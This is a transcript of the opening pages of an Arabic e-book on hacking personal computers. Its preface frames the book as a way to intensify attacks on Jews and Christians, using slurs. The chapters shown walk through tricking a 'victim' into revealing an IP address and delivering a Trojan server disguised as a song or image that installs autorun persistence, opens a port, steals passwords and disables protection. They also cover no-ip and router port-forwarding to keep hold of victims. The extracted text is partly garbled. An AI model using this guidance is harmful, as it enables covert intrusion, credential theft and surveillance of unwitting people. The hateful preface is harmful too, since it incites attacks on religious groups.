المرجع الشامل في اختراق الاجهزة

102
ProTo MaN 1

Upload: firas

Post on 15-Nov-2014

97 views

Category:

Documents


57 download

TRANSCRIPT

Page 1: المرجع الشامل في اختراق الاجهزة

ProTo MaN

1

Page 2: المرجع الشامل في اختراق الاجهزة

ProTo MaN

2

االكترونیة الطارق مكتبة

##كل ما يبحث عنه الھكرز المسلم##

كتب في جمیع مجاالت الكمبیوتر واالنترنتلتحمیل المزيد من ال

على الرابط التالياذھب إلى موقع المكتبة

com.0010t.www://http

بسم اهللا الرحمن الرحیم

-- ----- ------ ------- --- ------ ----- ----- ------ ----- ----- ------ -------

جمیع الحقوق محفوظة للمؤلف

ProTo MaN

-- ----- ------ ------- --- ------ ----- ----- ------ ----- ----- ------ -------

تصمیم --------------------------------------------------------------

aLTar3q ---------------------------------------------------------------

الناشر لھذا الكتاب على االنترنت

Page 3: المرجع الشامل في اختراق الاجهزة

ProTo MaN

3

Page 4: المرجع الشامل في اختراق الاجهزة

ProTo MaN

4

الفھرس

=================================

ـــــــــــــــــــراق مدخل الى عالم االختـــ1

ــــــــــــــــــــــــتـ عقد االنترنـــــــــــــــ2

احصـــــــــــــــــــــــــــــــــــــنة طروادة3

عمل حساب نو ايبي لضمان ايبي ثابت4

تسجیل برنامج النو ايبي وتفعیلـــــــــه5

فتح منفـــــــــــــذ في رواتر سبید تتش6

فتح منفذ في جمیع االجھزة مھما كانت7

شرح برنامج البیفروســـــــــــــــــــــت8

التشفیر بتحرير قیم الســـــت العشري9

التشفیر بتغییر نقـــــــــــــــط االدخال10

التشفیر باكواد التشفیــــــــــــــــــــــر11

تجاوز الدفاع االستباقي لدى الكاسبر12

ثغرات المتصفح بالتفصیل الممــــــل13

ةــــــــــــــــــالمدموج البرامج تحلیل 14

=================================

Page 5: المرجع الشامل في اختراق الاجهزة

ProTo MaN

5

مقدمة الكتاب

حـول شـامل ھذا الكتـاب ھـو ثمـرة مجھـود شخـصي وفیـه مرجـع .اهللا بإذن األجھزة اختراق ستحترف خاللھا ومن األجھزةاختراق

ولـیس للـضر وإلحـاق األذى العامـة دةئـ للفا ھذا الكتاب كتابة تمت

أساســي كھــدف ھــي بــل سلمینبــاآلخرين وخاصــة أخــوانكم المــ مـن الیھـود الخنـازير ضد جماتھال لتكثیف اإلسالمیة الوحدة تدعیم

.والنصارى

بطرق الكتاب في ما باستخدام يقوم من من مسؤولیتي اخلي وانأ .خاطئة أو شرعیة غیر

لكم شكرا و النقل عند المصدر و اسمي كرذ أرجو

اخوكم في اهللا

PROTO MAN

COM.MSN@Z4M

Page 6: المرجع الشامل في اختراق الاجهزة

ProTo MaN

6

اإلھـــــــداء

:الكتاب اھداء لكل من

General Loser

Hack-de-vip - HTML – BigX – Snake1095 – P9 – P7-ToXiC350 - HAWAD – oussamio – Calimero – Saken ALkoboor – Darkwar - Reda Ovich – ZX-VIRUS – vB.SnIpEr – Cold Fire – Abou Soud

كما اتوجه بتحیة الى المنتديات العربیة

منتديات العاصفة

منتديات اللیزر

منتديات ترياق العرب

و لكل المجموعات العربیة

Mafia Taourit – Tryag TeaM - H-T TEAM

Page 7: المرجع الشامل في اختراق الاجهزة

ProTo MaN

7

مدخل إلى عالم اإلختراق

:الفھرس I-تقديم

II- تعريف اإلختراق III- تاريخ اإلختراق IV- دوافع اإلختراق V- أثار اإلختراق

VI- خاتمة I- تقديم:

إن اإلختراق كفكرة أساسیة يرتكز على المعرفة المسبقة باالنترنیـت و الحاسـب اآللـي ختـرق فـي التعامـل مـع لغـات البرمجـة و أنظمـة التـشغیل و ھو يعتمد علـى مھـارة الم

)Windows – Linux/Unix – Mac ( تطیع التجـسس علـى و مـن خـالل اإلختـراق تـس .یانات خاصة ألشخاص معینین بدون تصريح من مالك الحاسوببمعلومات شخصیة و

II- تعريف اإلختراق:

ال تخـصك لتـصیر لـك كـل مصطلح اإلختراق ھو عملیـة قرصـنة أو تجـسس علـى بیانـات صالحیات المدير على ذلك النظام و إن صح التعبیر ھو عملیة اقتحام شخص غیـر مـصرح له بالولوج إلى نظام معین بالدخول إلیه مستعمال في ذلـك أسـلحته البرمجیـة و خبرتـه بنظم الحماية و التشغیل مھاراته بلغات البرمجة مـن خـالل ثغـرات يكتـشفھا فـي نظـام

. سواء كانت أجھزة أو مواقع أو خوادم أو حتى بريدا إلكترونیاالحماية

III- تعريف المخترق:

المخترق ھو شخص له مھارات عالیة في استخدام لغات البرمجة و خبرة كبیرة بنظم التشغیل، كما انه شخص يحاول دائما إيجاد حلول إلختراق نظم الحماية الجديدة و

. ن ثغراتيؤمن بأنه ال يوجد نظام بدوو لذلك لكي تتمكن من تعلم اإلختراق يتوجب علیك أن تجتھد لتتعلم لغات البرمجة و

، كما أن علیك أن تحیط ) …C#,VB,Java,PHP,perl,Html: (أھمھا في مجال اإلختراقستخدمیه ألنه مفتاح اختراق و لو لم تكن من م) Linux(بنظم التشغیل و خاصة

... المواقع ، باإلضافة إلى أن علیك التقرب من نظم الحماية ألنھا ستكون ألد أعدائك

Page 8: المرجع الشامل في اختراق الاجهزة

ProTo MaN

8

IV- تاريخ اإلختراق: :1980 قبل -1-

في ھذه الفترة لم يكن لإلختراق وجود ألن الحاسوب الشخصي لم يكن موجودا بعد،،، غطى نطاقا واسعا في الواليات المتحدة األمريكیة و لكن في تلك الفترة كان الھاتف قد

في ذلك الوقت كان االختراق بأسلوب مختلف حیث كان يستمتع العاملون في إحدى شركات الھاتف باإلستماع إلى مكالمات غیرھم و تحويل المكالمات و لھذا تم تحويل

!! اإلطارات العاملة في الشركة إلى إطارات نسائیةو في الستینات ظھر الحاسوب األول لكن ال يوجد إلختراق وجود بعد ألن أمثال ھذا الحاسب ال يمكن إال من قبل األغنیاء و كبرى الشركات و نظرا ألھمیتھا البالغة كانت

.ذات درجات حرارة ثابتة كما أن الحراسة علیھا مشددة توضع في غرف

:1989 إلى 1980 من -2-

من صناعة حاسوب صغیر الحجم ) IBM( تمكنت الشركة المعروفة 1981في سنة وسھل اإلستعمال و من ھنا أطلق مستعملو الحاسب العنان لمواھبھم بدأت رحلة

.ب حاسبات المؤسسات التجاريةاإلختراق وظھرت حینھا مجموعات تقوم بتخري :1990 منذ -3-

ازدھر اإلختراق في ھذه الفترة إلنشار الحاسب اآللي ، فظھرت مجموعة من بدأت رحلتھم باختراق أجھزة غیرھم إلى أن ظھرت ) LOD(المخترقین الھواة اسمھا تنافس المجموعة األولى لتبدأ حرب بینھما انتھت ) MOD(مجموعة أخرى اسمھا

لتنتھي الحرب على اثر ذلك،، ) MOD(القبض على مجموعة ب

وفیما بعد انتشرت فكرة اإلختراق و طرقه و أدى ذلك إلى ظھور الكثیر من Kiven(و في وقتنا الحالي نستطیع القول أن أشھر و أبرز مخترق ھو .... المخترقین

Mitenik (الذي عجزت ال)F.B.I (اسیب شركة عن مالحقته و لكن بعد اقتحامه حو)Digital Equipement Company ( انتھى به األمر بسنة في السجن و لكن بعد خروجه

و بعد انقضاء مدة ... بطاقة ائتمان 20000سجن لمدة سنة أخرى بعد قیامه بسرقة سجنه لم يفرج علیه مكتب التحقیقات الفیدرالي العتبارھم له خطرا على السالمة

...د نظام يعجز عن اختراقهالمعلوماتیة و ألنه ال يوج

Page 9: المرجع الشامل في اختراق الاجهزة

ProTo MaN

9

IV- دوافع اإلختراق :

لم توجد أساسا للتباھي أو للعبث أو لقضاء أوقات الفراغ بل ھي االختراقإن ظاھرة .ظاھرة موجھة وجدت لسببین رئیسیین

:و لكن يمكن حصر أسباب االختراق في ثالثة تتوزع كالتالي : الدافع السیاسي و العسكري -1-

ما نالحظه حالیا من تطور ھائل في الجانب السیاسي و العسكري أدى بشكل مباشر إلى اإلعتماد على تقنیات الحاسب اآللي في ھذا المجال فابتكرت ظاھرة اإلختراق أو التجسس لمعرفة أسرار العدو خاصة أن المعلومات تنقل في الشبكة

.العالمیة لالنترنیت : الدافع التجاري -2-

من المعروف و الجلي الصراع بین كبرى الشركات التي تعیش حربا دائمة فیما بینھا، و محاولة إختراق 50قد أكدت دراسات حديثة أن ھذه الشركات تتعرض إلى أكثر من

يومیا، و يعود ذلك لمحاوالت الشركات المنافسة معرفة أسرارھا و القیام بتخريب .حاسباتھا

: الدافع الفردي -3-

بدأت أولى محاوالت اإلختراق بین طالب الجامعات في الواليات المتحدة األمريكیة كنوع من التباھي بین الطالب بمھاراتھم في مجال الحاسب اآللي، كما كانوا يحاولون

و يمكن تلخیص الدافع الفردي كأنه نوع من التباھي أو ... اختراق مواقع أصدقائھم ...ا يمكن أن يكون بدافع التسلیة أو حتى لإلنتقامالتحدي أو إلثارة اإلعجاب كم

V- آثار اإلختراق :

يعتمد أثر أو آثار علمیة اإلختراق على نوعیة المخترق و على ھدفه وراء العملیة التي :قام بھا ويمكن تلخیص ابرز األضرار كاآلتي

يمكن تخريب حاسوب أو شبكة محلیة أو حتى كل حاسبات شركة بإطالق ...وسات أو إعادة تھیئة األقراص الصلبة أو بإتالف اللوحة األم و المعالجفیر

الحصول على كلمات سر الخاصة بك للولوج إلى البريد اإللكتروني و اشتراكاتك ... في االنترنیت و حتى أرقام بطاقة االئتمان الخاص بك

Page 10: المرجع الشامل في اختراق الاجهزة

ProTo MaN

10

صدة من الحصول على أرقام بطاقات االئتمان لكثیر من األشخاص و تحويل األر ...شخص إلى آخر و بذلك تعم الفوضى و تكبد البنوك خسائر مالیة كبیرة

VI-الخاتمة

اإلختراق ھو سالح يمكنك توجیھه كما تشاء ، و لكن اجعل لتعلیمك ھدفا و لیكن اختراقك موجھا ، و ال تقم بأي عمل تخريبي مستعمال ما تعلمته و ال تظلم أحدا و ال

. ذنب لهتخترق شخصا بريئا ال

Page 11: المرجع الشامل في اختراق الاجهزة

ProTo MaN

11

عقد االنترنت

:الھدف۩ .التعرف على عنوان عقد االنترنیت و معرفة كیفیة استخراجه

:األدوات المستعملة۩

URLENCODE :و ھو برنامج تشفیر عنوان عقد االنترنیت الخاص بك. مجموعة من برامج المحادثة . ICQ IP :نوان عقد االنترنیت لمخاطبك على الـيقوم ھذا البرنامج بحفظ ع)ICQ.( IRC Scanner :و ھو برنامج يقوم بمسح قنوات الــ)IRC.( Notification Softwares :برامج التبلیغ.

:الفھرسI-تقديم

II-تعريف عقد االنترنیت III-مبدأ عمل االنترنیت

IV- طرق استخراج عنوان عقد االنترنیت)IP( الخاص بك) IP(ـ عنوان ال-1 الخاص بھدفك) IP(ـ عنوان ال-2

عن طريق الجدار الناري- أ عن طريق البريد اإللكتروني - ب

عن طريق بريد مرسل عن طريق بريد وارد

عن طريق برامج المحادثة- ج عن طريق )MSN—Yahoo Messenger( عن طريق )ICQ( عن طريق قنوات mIRC

عن طريق برامج التبلیغ- د عن طريق إنشاء منتدى- ه

Page 12: المرجع الشامل في اختراق الاجهزة

ProTo MaN

12

I- مقدمة:

مـن نظـام الھواتـف علـى االسـتفادة تنطلق فكرة عقد االنترنت من نظام الھواتـف فبعـد سھیل الوصـول إلـى مـشتركیه ، و بـذلك ظھـرت فكـرة عنـوان عقـد ترقیم مـشتركیه لتـ

).IP( االنترنیت II- تعريف عقد االنترنت:

لكل شخص على شبكة االنترنت عنوان يدل علیه ھذا العنوان ھو عقد االنترنیت خاص به ال ) IP( والذي يعتبر بمثابة ھويته على الشبكة و لكل متصل بالشبكة عنوان

. شخص واحد يملكه أكثر من

إذن كل جھاز متصل له عنوان خاص به و كذالك كل خادم أو موقع له عنوان ال يتكرر .والذي من خالله تستطیع إرسال و استقبال المعلومات

أعداد تفصل بینھا نقاط و من خالله نستطیع تحديد 4و يتكون عنوان عقد االنترنت من

.خدمة و كل المعلومات الممكنة عنه و مدينته و مزود ال) IP(بلد صاحب عنوانا

): MICROSOFT(وھو عنوان عقد االنترنیت الخاص بموقع : مثال

وتتم قراءته من الیسار إلى الیمین يمثل الرفعة الجغرافیة التي ينمي إلیھا ھذا العنوان أي البلد. الجزء الثاني من العنوان يمثل رقم المنطقة أو الحاسب المزود . ھذا الجزء يعین مجموعة الحواسیب التي ينتمي إلیھا مثل شبكة محلیة أو غیرھا. و الجزء األخیر يعین الجھاز نفسه المتصل بالشبكة.

و من جھة أخرى ھو الھكرز المخترقین دلیال لكشف ھوية IP)(و لھذا يعتبر عنوان الــ

. مفتاح عملیة االحتراق ألنه يحدد ھدفك أو ضحیتك

Page 13: المرجع الشامل في اختراق الاجهزة

ProTo MaN

13

III- مبدأ عمل عقد االنترنیت :

مركز معلومات الشبكة و بذالك تأخذ بعین االعتبار عدم تكرار IP)(يقوم بتوزيع عناوين الـ :العناوين و تطبیق العناوين كالتالي

مجموع عدد الشبكات المتاحة أول جؤجؤ الصنف الشبكات

عدد األجھزة في كل شبكة

16777214 126 126.0.0.0 > 1.0.0.0من 126 > 1من أ

65534 16302 191.254.0.0 > 128.1.0.0من 190 > 128من ب

254 2097150 223.255.254.0 > 192.0.1.0من 223 > 192من ج

: مثل و توجد عناوين ال يمكن استخدامھا ألنھا محجوزة

0.0.0.0 127.0.0.0 128.0.0.0 191.255.0.0 223.255.25.5.0

عنوان الــ (IP)

أجزاء و كل جزء يمثل جؤجؤ أو كل جؤجؤ 4من IP Adress) (يتركب عنوان عقد االنترنت جؤجؤ و يتم الفصل بین 4 برنشاه مما يعني 32 برنشاه أي أن الحاصل ھو 8يساوي

127.0.0.1: األجزاء بنقاط مثال

يسمى 1 مما يعني أن1 أو 0 البرنشاه يساوي رمزا واحدا و ال يكون إال :مالحظة .برنشاه وكذالك ھو الصفر

. ھو عبارة عن برنشاه أي جؤجؤ 11001110 إذن فالعدد

على الشبكة بالنظام افتراضيعرض لعنوان عن عنوان عقد االنترنت ھو عبارة :خالصة . الثنائي

: النظام الثنائي *

:اه كالتالي برنش8 أجزاء و كل جزء يمثل 4يتكون كل جزء من عنوان عقد االنترنت من 11111111

:لنتمكن من معرفة رقم عنوان عقد االنترنیت من خالل النظام الثنائي نقوم باآلتي

ثم نضاعفه في كل برنشاه قادمـة ثـم 1 تمثل عددا معینا ونبدأ من العدد 1كل برنشاه يمثلھـا عـدد كمـا موضـح فـي الـصورة و كـل 1نجمع ما تحصلنا علیه حیث كـل برنـشاه

. يمثلھا الرقم صفر 0برنشاه

Page 14: المرجع الشامل في اختراق الاجهزة

ProTo MaN

14

:مثال

.255ھذا الجزء من عقد االنترنت يمثل العدد

:أمثلة

92 = 0+64+0+16+8+4+0+0 يعني 92 = 01011100 -

235 = 128+64+32+0+8+0+2+1 يعني 235 = 11101011 -

.كما يمكنك التحويل من النظام المعروف إلى النظام الثنائي بإجراء عملیة عكسیة

-- --------- ----- ----- ------ ----- ----- ------ ------- --- ------ ----- ----- ------ ----- ----- ---- أصناف الشبكات:

الصنف أ

X 24 - X 8برنشاه

الشبكات الرئیسیة الشبكات الفرعیة )أجھزة ( المضیف

رعیة برنشاه لألجھزة و الشبكات الف24 برنشاه للشبكات الرئیسیة و 8نالحظ تخصیص

يعني الجزء األول فقط من العنوان مخصص للشیكات الرئیسیة و الثالث أجزاء األخرى . لألجھزة و الشبكات الفرعیة

Page 15: المرجع الشامل في اختراق الاجهزة

ProTo MaN

15

الصنف ب

X 16 - X 16برنشاه

الشبكات الرئیسیة الشبكات الفرعیة )أجھزة ( المضیف

شبكات برنشاه لألجھزة و ال16 برنشاه للشبكات الرئیسیة و 16نالحظ تخصیص

كات الرئیسیة و الجزأين بالفرعیة يعني الجزأين األولین فقط من العنوان مخصص للش . اآلخرين لألجھزة و الشبكات الفرعیة

ج الصنف

X 16 - X 24برنشاه

الشبكات الرئیسیة الشبكات الفرعیة )أجھزة ( المضیف

جھزة و الشبكات برنشاه لأل16 برنشاه للشبكات الرئیسیة و 24نالحظ تخصیص

الفرعیة يعني الثالث األجزاء األولى فقط من العنوان مخصصة للشیكات الرئیسیة . والجزء األخیر لألجھزة و الشبكات الفرعیة

القناع )MASK:(

تنحصر مھمته في تحديد بنیـة عنـوان عقـد االنترنیـت، أمـا بنیـة ) Mask(لكل صنف قناع و ھـذه ھـي األقنعـة . برنـشاه 32 االنترنیت متكون من القناع فھي مثل بنیة عنوان عقد

:المقابلة لكل صنف

الصنف

عدد البرنشاه المخصصة للشبكة الرئیسیة

عدد البرنشاه المخصصة

لألجھزة القناع

255.0.0.0 24 8 أ

255.255.0.0 16 16 ب

255.255.255.0 8 24 ج

و كما نعلم أن ھذا العنوان 120.120.8.3النترنیت لنعتبر أن لديك عنوان عقد ا:مالحظة و لكنك تجد أن القناع 255.255.0.0 و القناع الخاص بھذا الصنف ھو - ب –من الصنف

و يعود ذلك لكثرة مستعملي - ج – و مثل ھذا القناع ھو للصنف 255.255.255.0ھو ) IP V4( اإلصدار الرابع الشبكة العالمیة لألنترنیت ذلك ألنه عند تصمیم عقد االنترنیت

لم تكن ھناك توقعات بمثل ھذا اإلقبال على الشبكة العالمیة و لھذا السبب تم تصمیم .و الذي يستوعب عددا أكبر من األجھزة) IP V6(عقد االنترنیت اإلصدار السادس

Page 16: المرجع الشامل في اختراق الاجهزة

ProTo MaN

16

IV- طرق استخراج عنوان عقد االنترنیت : : عنوان عقد االنترنیت الخاص بك- 1-

9(النسبة لباقة نظام تشغیل النوافذ بx-Me:( وبعــدھا تظھــر لــك نافــذة بھــا عنــوان عقــد ) WinIPcfg(فـي نافــذة تــشغیل تكتــب األمــر

.االنترنیت الخاص بك

بالنسبة لباقة نظام تشغیل النوافذ)NT-XP-Vista:( یـت فنحصل علـى عنـوان عقـد االنترن ) IPconfig(نكتب األمر ) DOS(بعد استدعاء موجة

.الخاص بك

كــذلك توجــد عــدة بــرامج تقــوم باســتخراج عنــوان عقــد االنترنیــت الخــاص بــك مثــل)NetTools (و كذلك برامج مسح الــ)IP (كما أن بعض أحصنة طروادة فیھا ھذه المیزة. توجد بعض المواقع التي تقدم ھذه الخدمـة و توجـد مواقـع متخصـصة فـي اسـتخراج

.معلومات الممكنة عنهعنوان عقد االنترنیت و ال : عنوان عقد االنترنیت الخاص بھدفك- 2-

: عن طريق الجدار الناري-أ :لتنجح ھذه الطريقة يجب أن يتوفر لديك

..أو غیره) Zone Alarm – PC Cillin(جدار ناري مثل -1

عنوان عقد االنترنیت الخاص بك أنت -2

ل رابط ثم تضعه على صفحتك الخاص بك تضعه في شك) IP(بعد استخراج عنوان الخاصة أو تقدمه لضحیتك على شكل رابط في برامج المحادثة ، و بإمكانك وضع الرابط

لجعل ) URLENCODE(مشفرا ومن أشھر برامج تشفیر عنوان عقد االنترنیت برنامج العملیة أكثر أمانا، وبعد أن يقوم ضحیتك بالضغط على الرابط سوف يقوم برنامج الجدار

ناري لديك بإعالمك انك تتعرض لمحاولة اختراق وطبعا سیعطیك عنوان عقد ال . أال وھو ضحیتك االختراقاالنترنیت لمحاول

: عن طريق البريد اإللكتروني-ب

عن طريق بريد مرسل:

الشخص الذي تريد معرفة عنوان عقد االنترنت الخاص به ترسل له بريدا الكترونیا وتقـوم ــا ــال ) TO.confirm(فة بإضـــ ــي مثـــ ــده االلكترونـــ ــوان بريـــ ــة عنـــ ــد كتابـــ بعـــ

TO.confirm.Com.MSN@Victim_Your ــصلك ــالة ت ــتح الرس ــحیتك بف ــوم ض ــا يق و لمرسالة تعلمك بأنه فتح رسالتك و فیھا عنوان عقد األنترنـت الخـاص بـه طبعـا و دون آن

. لم ھو بذلكيع

Page 17: المرجع الشامل في اختراق الاجهزة

ProTo MaN

17

عن طريق بريد وارد:

ــارات البريــد فــي و قــم بتغییــر ) Message headers(اذھــب إلــى ) HOTMAIL(مــن خی ).Advanced(االختیار إلى

اآلن في كل رسالة واردة عنـدك سـتجد عنـوان عقـد االنترنیـت الخـاص بمرسـل البريـد .وبعض المعلومات االخرى

:دثةعن طريق برامج المحا-ج

عن طريق )MSN-Yahoo Messenger:(

لتنجح ھذه الطريقـة يتوجـب علیـك أن تكـون متـصال ببرنـامج المحادثـة مـع ضـحیتك وان تقیم معه اتصاال صوتیا أو مرئیا أو بصدد إرسـال أو اسـتقبال ملـف ، أمـا بعـد افـتح موجـة

)DOS ( و اكتب األمر)NETSTAT –N (لتالیةو بعدھا ستظھر لك الصورة ا:

نجد في ھذه الخانة البروتوكوالت المستعملة في عملیة اإلتصال )TCP/UDP( شبكة محلیة أو الشبكة ( أما ھذه فنجد فیھا عناوين عقد االنترنیت الخاصة بك

) العالمیة و ھذه نجد فیھا عناوين عقد االنترنیت المتصلة بجھازك و فیھا نجد عنوان )IP (

الخاص بضحیتك ھنا نجد حاالت االتصال بین جھازك و األجھزة األخرى مھما كانت .

حالته 3 عنوان عقد االنترنیت الخاص بضحیتك ھو آخر اتصال في الخانة عدد )TIME_Wait.( عن طريق )ICQ:(

ــ االسـم [عنـوان عقـد االنترنیـت يظھـر فـي معلومـات المـستخدم )ICQ(في برنـامج الـ فـإن بإمكانـك اسـتعمال IP)( و ان كان قد ألغـى خیـار عـرض عنـوان ]یتكالمستعار لضح

الذي يقوم بحفظ عنوان عقد االنترنیت لمن نحادثـه فـي مـسند نھـي ICQ IP)(برنامج ICQ)(تقوم أنت بتحديد مكان حفظه و يتم تشغیل البرنامج مع الـ

Page 18: المرجع الشامل في اختراق الاجهزة

ProTo MaN

18

عن طريق قنواتmIRC:

:فة عنوان عقد االنترنیت لضحیتك يمكنك استعمال األمر التالي لمعر/DNS Your_Victim’s_nick_name

تضع مكانه االسم المـستعار لـضحیتك، و لكـن Your_Victim’s_nick_name) (علما وأن الـصحیح و لـذلك IP)(فـال تتحـصل علـى عنـوان Shell) ( أو (proxy)البعض يـستعملون

).IRC(أنصحك باستخدام برنامج مسح لقنوات الــ : عن طريق برامج التبلیغ-د

تـضع فیـه ) بـأي طريقـة تريـد (توجد برامج تقوم بصنع ملف صغیر الحجم ترسله لضحیتك إعدادات التبلیغ الخاصة بك لیصلك عنوان عقد االنترنیت الخـاص بـضحیتك فیمـا بعـد عبـر

ــ دات المھم بالطريقة التي قمـت أنـت بتحديـدھا فـي إعـدا ) ICQ(البريد االلكتروني أو بال . ملف الخادم

: عن طريق إنشاء منتدى- ـ ھ

ھذه الطريقة سھلة و فعالة، قم بإنشاء منتداك الخاص و توجد مواقع تسمح لك بإنشاء بعد ذلك اذھب إلى لوحة التحكم الخاصة بالمدير و التي , منتداك مجانا، على كل

.تداكستجد فیھا كل عناوين عقد االنترنیت للموجودين في ذلك الوقت بمن V-خاتمة :

عنوان عقد االنترنیت مھم جدا في عملیة اإلختراق ، كما أنه قد يكون دلـیال إلدانتـك اثـر ــك، و لھــذا يفــضل ــد مكان ــستطیعون تحدي ــه ي ــه مــن خالل ــك ألن ــات اختراق إحــدى عملی

.وتوجد طرق كثیرة للتخفي ) Proxy(استخدام

Page 19: المرجع الشامل في اختراق الاجهزة

ProTo MaN

19

اإلختراق عن طريق أحصنة طروادة

:دفالھ۩ .التعرف عن كثب على أحصنة طروادة و بیئة عملھا و خطورتھا

:األدوات المستعملة۩

درس نظري

: الفھرس تقديم- تعريف أحصنة طروادة- مكونات أحصنة طروادة- مبدأ عمل أحصنة طروادة- خطورة أحصنة طروادة- أحصنة طروادة في مرمى مضادات الفايروسات- خاتمة-

Page 20: المرجع الشامل في اختراق الاجهزة

ProTo MaN

20

I-تقديم :

طروادة ھي برامج تمكنك من الولوج إلى أنظمة غیرك و التجسس علیه ومعرفة أحصنةلكن في البداية كان تصمیم أحصنة طروادة بغرض معرفة ما يقوم به . بیانته الخاصة

التخريب استخدامھا بھدفأصبح او مراقبة سیر عمل الموظفین، و بتقادم الزمن األبناء ملفات تخريبیة و الأنھاو التسلسل الى حاسبات الغیر وبذلك صار ينظر إلیھا على

.فرق بینھا و بین الفايروسات II-تعريف حصان طروادة :

حصان طروادة ھو برنامج يعطیك سیطرة كاملة على حاسب غیرك بعد اصابته بملف خالله بكل سرية دون أن الخادم الذي يفتح لك منفذا في حاسب ضحیتك تدخل من

يتفطن لك اال اذا كان له جدار ناري وغالبا ما يقوم ملف الخادم بقتل الحمايات بعد دخوله الى النظام فنتخطى مشكلة جدران الحماية، كما ان جزء الخادم يقوم بوظیفة

. تبلیغك بعنوان عقد االنترنیت لضحیتك عبر طرق تقوم أنت بتحديدھا

III-صان طروادة مكونات ح:

: أجزاء و ھي كالتالي3يتكون حصان طروادة أساسا من

و ھو مكتب اإلدارة و ھو أداة التحكم بحاسب الضحیة ): Client( ملف الزبون -1 .ولذلك يعتبر الجزء الرئیسي من حصان طروادة

و ھذا الجزء ھو الطرف الثاني في عملیة اإلتصال حیث ): Server( ملف الخادم -2 .فذا تلج من خالله و يبلغك بعنوان عقد االنترنیت الخاص بضحیتكيفتح لك من

بفضل ھذا البرنامج الصغیر تستطیع تغییر ):Edit Server(ملف إعدادات الخادم -3، و خیارات الخادم إعدادات ملف الخادم الخاص بك لتناسبك و كیفیة التبلیغ

. تختلف من برنامج آلخر

. إعداداته وقد أحیانا تجد كل ھذه في ملف واحد قد يدمج ملف الخادم في:مالحظة

Page 21: المرجع الشامل في اختراق الاجهزة

ProTo MaN

21

IV-مبدأ عمل حصان طروادة :

قم بتغییر إعدادات الخادم لتناسب طريقة التبلیغ التي تريدھا االختراقلتنجح عملیة ه يقوم ملف ح غیره للتضلیل و عند فتأو أو صورة أغنیةثم ترسله لضحیتك في شكل

:الخادم غالبا بما يلي

نسخ نفسه فالــ)Windows (أو فالــ )system32 (ما قمت أنت بتحديدهثحی .

اإلتجاه إلى ملفات الـسجل و إضـافة قیمـة تمكنـه مـن التـشغیل تلقائیـا مـع بـدء .تشغیل الحاسب

فتح منفذ يمكنك من الولوج إلى حاسب ضحیتك فیما بعد من خالل ملف الزبون.

سر التي استعملتھا ضحیتك إذا كنت انت القیام بعملیات إضافیة كحفظ كلمات ال . قد حددت ذلك

بالـشبكة العالمیـة يقـوم بتبلیغـك بعنـوان اتـصال و بعد اإلصابة بملف الخادم فإنه مع أول نترنت الخاص به و بعدھا تتصل معه مـستخدما برنـامج الزبـون و يـصبح الحاسـب عقد اال .ملكا لك

V-خطورة أحصنة طروادة :

وم بعملیة تخريب للحاسب الذي يصاب بھا خاصة إذا كانت مدمجة مع أحصنة طروادة تق :فايرس و يمكن تعداد أضرار أحصنة طروادة في التالي

فتح بوابة عبور للحاسب الذي يصبح عرضه لعملیة اإلختراق حتى لمن لم يقم

بإرسال الخادم فیستطیع أي مخترق القیام بعملیة مسح لنطاقات من عناوين یت لیحصل على الحاسبات المصابة و التي تحتوي على منافذ عقد االنترن

.مفتوحة

الحصول على كلمات سر مستخدم الحاسب المصاب من كلمات سر البريدااللكتروني إلى كلمات سر بطاقات االئتمان و اشتراكات االنترنیت وكل ما يكتبه

.بواسطة لوحة المفاتیح

حتى يصبح الحاسب في خطر و عرضة قتل كل برامج الحماية و الجدران النارية .لھجمات المخترقین و الفايروسات

. و تختلف األضرار و تتغیر حسب نوعیة المخترق و نواياه وأھدافه وراء عملیة اختراقه

Page 22: المرجع الشامل في اختراق الاجهزة

ProTo MaN

22

VI-أحصنة طروادة في مرمى مضادات الفايروسات :

نظرا بالنسبة لمضادات الفايروسات تعتبر أحصنة طروادة ملفات دخیلة و مؤذية وبذلك ..... لخطورتھا بعد أن تغیر استعمالھا و صارت تستخدم لتحقیق أھداف شخصیة

لم تعد تنفع مع من لديه مضاد فیروسات و لذلك يتوجب تشفیر ملف الخادم من خالل .ھذا الكتاب الحقًا عدة طرق متوفرة وھو ما سیتم شرحه في

VII-خاتمة :

و أفــضل مــا يمكــن أن يبــدأ بــه أي مختــرق نظــرا االختــراقأحــصنة طــروادة ھــي مفتــاح . االختراقلسھولة استعمالھا و ھي ال تمثل سوى انطالقة صغیرة جدا في عالم

Page 23: المرجع الشامل في اختراق الاجهزة

ProTo MaN

23

ثابت ip لضمان no-ipتكوين حساب

ipالنو ايبي ھي شركة تبیع الدومینات وھي تعطیك دومین مرتبط بال ھذا للحصول على ايبي ثابت لضمان عدم و نحن الھكرز نستغل الخاص بك

تابع الشرح بالصورno-ipاالن سنقوم بتكوين حساب .. ضیاع الضحیة

/com.ip-no.www://http.. واتبع الشرح بالصور ادخل على الموقع

Page 24: المرجع الشامل في اختراق الاجهزة

ProTo MaN

24

التالیةبعد الضغط على خیار التسجیل سوف تظھر لك الصورة

Page 25: المرجع الشامل في اختراق الاجهزة

ProTo MaN

25

اذھب الى بريدك وفعل االشتراك.. اآلن تم التسجیل في الموقع

Page 26: المرجع الشامل في اختراق الاجهزة

ProTo MaN

26

بعد ذلك يجب علیك تحمیل البرنامج الخاص بھم من نفس الموقع

Page 27: المرجع الشامل في اختراق الاجهزة

ProTo MaN

27

Page 28: المرجع الشامل في اختراق الاجهزة

ProTo MaN

28

Page 29: المرجع الشامل في اختراق الاجهزة

ProTo MaN

29

.االن وقد تم عمل حسابات لك سنقوم بتنصیب البرنامج وتفعیله

Page 30: المرجع الشامل في اختراق الاجهزة

ProTo MaN

30

تفعیلهو NO-IPتنصیب برنامج

نضغط على ايقونة البرنامج بعد تحمیله من االنترنت

ونقوم بتثبیته على الجھاز بالطريقة التقلیدية

Page 31: المرجع الشامل في اختراق الاجهزة

ProTo MaN

31

Page 32: المرجع الشامل في اختراق الاجهزة

ProTo MaN

32

Page 33: المرجع الشامل في اختراق الاجهزة

ProTo MaN

33

فتح منفذ في رواتر سبید تتش

نذھب إلى المتصفح ونقوم بادخال ھذا العنوان

/ouchspeedt://http

اآلن دخلنا على لوحة التحكم الخاصة بالرواتر

اتبع الشرح في الصور

Page 34: المرجع الشامل في اختراق الاجهزة

ProTo MaN

34

Page 35: المرجع الشامل في اختراق الاجهزة

ProTo MaN

35

Page 36: المرجع الشامل في اختراق الاجهزة

ProTo MaN

36

Page 37: المرجع الشامل في اختراق الاجهزة

ProTo MaN

37

Page 38: المرجع الشامل في اختراق الاجهزة

ProTo MaN

38

